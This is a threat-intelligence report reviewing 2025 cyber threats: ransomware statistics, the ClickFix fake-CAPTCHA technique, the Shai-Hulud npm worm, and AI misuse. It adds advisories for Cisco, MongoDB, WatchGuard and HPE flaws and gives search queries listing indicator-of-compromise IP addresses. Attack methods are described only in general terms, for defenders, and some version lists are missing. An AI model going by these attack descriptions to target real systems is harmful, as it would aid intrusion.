This week, we reviewed 2025 statistics with our clients, including ransomware, ClickFix, software vulnerabilities, supply chain compromises, and AI usage.
KEY TAKEAWAYS
Review the top cyber threats from 2025, and what to expect in 2026.
Critical and high-severity vulnerabilities in Cisco, MongoDB, WatchGuard, and HPE, plus updates to CISA KEV, patch now!
2025 was an interesting year in cybersecurity. It saw a continuation of previous trends, such as double-extortion ransomware and thousands of software vulnerabilities, and the growth of trends such as AI usage and supply chain attacks, and new trends such as the social engineering tactic known as ClickFix. This article will cover some of the notable examples of these trends, as well as what to expect in 2026.
Ransomware Continues to Thrive
While the total amount of ransomware payouts has actually declined in recent years, the impact to businesses across the globe has continued to increase. Per CheckPoint's State of Ransomware Q3 2025, there has been a roughly 25% increase in claimed ransomware victims year-over-year. Based on their analysis of monitored data leak sites, ransomware groups are posting an average of 520 to 540 victims per month.
Ransomware is a global issue, but over half of the known ransomware victims were in the United States. Industry vertical victimology was also relatively evenly distributed. Sadly, healthcare and education are common targets of ransomware.
According to DeepStrike's Ransomware Statistics 2025, the most common initial access method for ransomware groups was RDP or VPN compromise via stolen or brute-forced credentials, accounting for roughly 50% of ransomware intrusions. This high number is due to the prevalence of stolen credentials via infostealer malware, as well as poorly secured remote access endpoints (weak passwords, no MFA). Vulnerable software accounted for over 30% of intrusions. Vulnerabilities in edge devices, such as firewalls, SSLVPN devices, and file share servers, can quickly become an open door for initial access brokers. The last 20% of intrusions resulted from social engineering attacks such as fake IT support emails and phone calls or ClickFix watering hole attacks.
ClickFix
The social engineering technique known as ClickFix (aka FakeCaptcha), has become widely adopted by threat actors in 2025. It has quickly become one of the most popular ways for threat actors to either gain initial access into an environment or deploy infostealer malware. The attack occurs when a user visits either a compromised site (drive-by attack) or is tricked into visiting an attacker-controlled site via phishing or SEO abuse. The victim is then presented with a prompt similar to this:
Fig 1: Fake CAPTCHA Example | Source: Elastic Security
If the victim follows the steps shown, this results in them opening the Run dialog box (oftentimes it will prompt to open PowerShell or CMD), pasting in malicious code, and then executing the malicious code. This sequence literally gets the target victim to run the malicious code on the threat actor's behalf. In most cases, this initial set of malicious code will download and execute a malicious file, establishing a foothold on that endpoint.
Other variants of this technique have emerged in recent months including FileFix, and ConsentFix. With these variants, although the presentation is different, the net effect is the same: Tricking users into running malicious code on their system and giving threat actors initial access.
Vulnerabilities Everywhere
As previously mentioned, software vulnerabilities accounted for over 30% of ransomware intrusions in 2025. Ironically, many devices that are intended to secure a network can be a company's biggest security liability. Unpatched edge devices that are vulnerable to remote code execution or authentication bypass are continuously targeted by initial access brokers. Once compromised, this access is then sold to the highest bidder on the darkweb (typically ransomware groups). Threat actors are becoming more efficient at weaponizing newly disclosed vulnerabilities, with mass exploitation commonly occurring 24-48 hours after vulnerability disclosure.
Supply Chain Compromises
Supply chain compromises are nothing new, see SolarWinds. However, 2025 saw an increase in supply chain attacks of code repositories. In September 2025, npm maintainers were phished, and attackers created a self-replicating worm known as "Shai-Hulud". This worm compromised at least 477 packages within 72 hours. Two months later, attackers launched Shai-Hulud 2.0, with even more advanced automation and replication, which impacted popular projects such as Zapier, PostHog, and Postman.
AI Usage
AI represents an interesting threat landscape for organizations. First, there is the data privacy threat. Users in organizations are using AI tools more and more, and organizations are struggling to identify this usage, what data is being sent to AI servers, and where this data is being stored. Simultaneously, threat actors are leveraging AI tools to create more realistic phishing lures, speed up development of malicious tools, and even automate certain parts of an intrusion. While AI has yet to really create anything novel from a hacking and intrusion perspective, it has certainly lowered the barrier for entry for cybercriminals.
Looking Ahead to 2026
In 2026, we will continue to see what we encountered this year, just more of it. Ransomware will continue to be an ever-present threat for all organizations. Threat actors will continue to be creative with their social engineering lures, especially with the assistance of AI tools. Critical vulnerabilities in edge devices will continue to be a pain point for organizations, leading to ransomware and data breaches. Due to the success of supply chain attacks like Shai-Hulud, threat actors will continue to increase their attempts to compromise code repositories.
What does this all mean for organizations moving forward? These security challenges are not going away, and they need to remain vigilant at all times. The good news is, all these threats can be countered with good cybersecurity hygiene. Organizations should review fundamentals like password policies, MFA implementation, network segmentation, EDR deployment and policies, user account privileges, network monitoring and logging, and patch management. Having these strong fundamentals will position an organization to be able to prevent and detect these threats before a substantial impact can be achieved.
Vulnerability Roundup
Cisco recently disclosed a maximum-severity flaw in Cisco Secure Email Gateway and Cisco Secure Email and Web Manager running CiscoAsyncOS Software that is under active exploitation. Tracked as CVE-2025-20393, the vulnerability allows threat actors to execute arbitrary commands with root privileges on the system. Systems are vulnerable when the following conditions are met: The appliance is configured with the Spam Quarantine feature, and the Spam Quarantine feature is exposed to the internet. Administrators are urged to implement the detailed system hardening recommendations provided by Cisco.
Per the threat report from Talos Intelligence, the exploitation has been attributed to a China-nexus APT group tracked as UAT-9686. Talos provided the following IP addresses as indicators of compromise:
\*.ip:(172.233.67.176 OR 172.237.29.147 OR 38.54.56.95)
MongoDB recently issued a security bulletin addressing a high-severity vulnerability that can allow unauthenticated threat actors to read memory or potentially gain remote code execution. The vulnerability is tracked as CVE-2025-14847. The following MongoDB versions are vulnerable:
Administrators are strongly urged to upgrade to MongoDB 8.2.3, 8.0.17, 7.0.28, 6.0.27, 5.0.32, or 4.4.30 as soon as possible.
WatchGuard recently disclosed a critical vulnerability in its Firebox firewalls. Tracked as CVE-2025-14733, this vulnerability allows for unauthenticated remote code execution on vulnerable systems. The flaw affects Firebox firewalls running Fireware OS 11.10.2 -> 11.12.4_Update1, 12.0 -> 12.11.5, and 2025.1 -> 2025.1.3. WatchGuard has indicated that this vulnerability is under current exploitation in the wild. Administrators are urged to apply updates as soon as possible. Per the WatchGuard advisory, any outbound communication to the following IP addresses from a Firebox device is a strong indication of compromise:
destination.ip:(45.95.19.50 OR 51.15.17.89 OR 172.93.107.67 OR 199.247.7.82)
Hewlett Packard Enterprise (HPE) recently fixed a maximum-severity vulnerability in HPE OneView, its IT infrastructure management software. Tracked as CVE-2025-37164, successful exploitation can allow for remote code execution on the vulnerable server. The flaw affects all versions of HPE OneView prior to version 11.00. Administrators are urged to apply the update as soon as possible.
The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog in the last 2 weeks:
This report is provided FREE to the cybersecurity community.
Visit our Cyber Threat Intelligence Blog for additional reports.
Subscribe to be notified of future Reports:
NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.
DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.